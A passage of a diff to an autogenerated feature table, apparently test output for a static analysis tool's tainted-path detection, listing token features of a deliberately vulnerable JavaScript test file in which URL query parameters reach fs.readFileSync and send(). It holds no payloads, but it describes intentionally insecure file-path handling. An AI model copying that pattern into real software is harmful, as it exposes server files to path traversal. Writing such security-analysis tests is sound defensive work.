url | +| autogenerated/TaintedPath/TaintedPath.js:136:17:136:21 | parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:17:136:21 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:17:136:21 | parse | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:136:17:136:21 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:136:17:136:21 | parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:136:23:136:25 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:23:136:25 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:23:136:25 | req | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:136:23:136:25 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:136:23:136:25 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:136:23:136:29 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:136:23:136:29 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:136:23:136:29 | req.url | calleeImports | url | @@ -5770,6 +62735,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:136:23:136:29 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:136:23:136:29 | req.url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:136:23:136:29 | req.url | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:136:27:136:29 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:27:136:29 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:27:136:29 | url | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:136:27:136:29 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:136:27:136:29 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:136:32:136:35 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:136:32:136:35 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/TaintedPath.js:136:32:136:35 | true | calleeImports | url | @@ -5779,6 +62749,41 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:136:32:136:35 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:136:32:136:35 | true | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:136:32:136:35 | true | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:136:38:136:42 | query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:38:136:42 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:38:136:42 | query | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:136:38:136:42 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:136:38:136:42 | query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:136:44:136:47 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:44:136:47 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:44:136:47 | path | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:136:44:136:47 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:136:44:136:47 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:8 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:8 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:8 | require | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:8 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:8 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:16 | exceptional return of require('send') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:16 | exceptional return of require('send') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:16 | exceptional return of require('send') | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:16 | exceptional return of require('send') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:16 | exceptional return of require('send') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:16 | require('send') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:16 | require('send') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:16 | require('send') | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:16 | require('send') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:16 | require('send') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:27 | exceptional return of require ... , path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:27 | exceptional return of require ... , path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:27 | exceptional return of require ... , path) | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:27 | exceptional return of require ... , path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:27 | exceptional return of require ... , path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:27 | require ... , path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:27 | require ... , path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:27 | require ... , path) | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:27 | require ... , path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:138:2:138:27 | require ... , path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:138:10:138:15 | 'send' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/TaintedPath.js:138:10:138:15 | 'send' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:138:10:138:15 | 'send' | calleeImports | | @@ -5803,6 +62808,52 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:138:23:138:26 | path | enclosingFunctionBody | req res path url parse req url true query path require send req path | | autogenerated/TaintedPath/TaintedPath.js:138:23:138:26 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:138:23:138:26 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:141:5:141:10 | server | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:5:141:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:141:5:141:10 | server | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:141:5:163:2 | server ... OK \\n\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:5:163:2 | server ... OK \\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:141:5:163:2 | server ... OK \\n\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:141:14:141:17 | http | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:14:141:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:141:14:141:17 | http | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:141:14:141:30 | http.createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:14:141:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:141:14:141:30 | http.createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:141:14:163:2 | exceptional return of http.cr ... OK \\n\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:14:163:2 | exceptional return of http.cr ... OK \\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:141:14:163:2 | exceptional return of http.cr ... OK \\n\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:141:14:163:2 | http.cr ... OK \\n\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:14:163:2 | http.cr ... OK \\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:141:14:163:2 | http.cr ... OK \\n\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:141:19:141:30 | createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:19:141:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:141:19:141:30 | createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:141:32:141:31 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:32:141:31 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:141:32:141:31 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:141:32:141:31 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:141:32:141:31 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:141:32:141:31 | this | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:32:141:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:141:32:141:31 | this | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:141:32:141:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:141:32:141:31 | this | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:141:32:141:31 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:32:141:31 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:141:32:141:31 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:141:32:141:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:141:32:141:31 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | 'arguments' object of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | exceptional return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | exceptional return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | functio ... OK \\n\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | functio ... OK \\n\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | functio ... OK \\n\\n} | calleeImports | http | @@ -5810,6 +62861,81 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | functio ... OK \\n\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | functio ... OK \\n\\n} | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | functio ... OK \\n\\n} | receiverName | http | +| autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:141:32:163:1 | return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:141:41:141:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:41:141:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:41:141:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:141:41:141:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:41:141:43 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:141:41:141:43 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:141:41:141:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:141:41:141:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:141:41:141:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:141:41:141:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:141:46:141:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:46:141:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:141:46:141:48 | res | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:141:46:141:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:141:46:141:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:142:7:142:10 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:7:142:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:7:142:10 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:142:7:142:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:142:7:142:10 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:142:7:142:48 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:7:142:48 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:142:7:142:48 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:142:7:142:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:142:7:142:48 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:142:7:142:48 | path = ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:7:142:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:7:142:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:142:7:142:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:142:7:142:48 | path = ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:16 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:16 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:16 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:16 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:22 | url.parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:22 | url.parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:37 | exceptional return of url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:37 | url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:37 | url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:43 | url.par ... ).query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:43 | url.par ... ).query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:48 | url.par ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:142:14:142:48 | url.par ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:142:18:142:22 | parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:18:142:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:18:142:22 | parse | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:142:18:142:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:142:18:142:22 | parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:142:24:142:26 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:24:142:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:142:24:142:26 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:142:24:142:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| 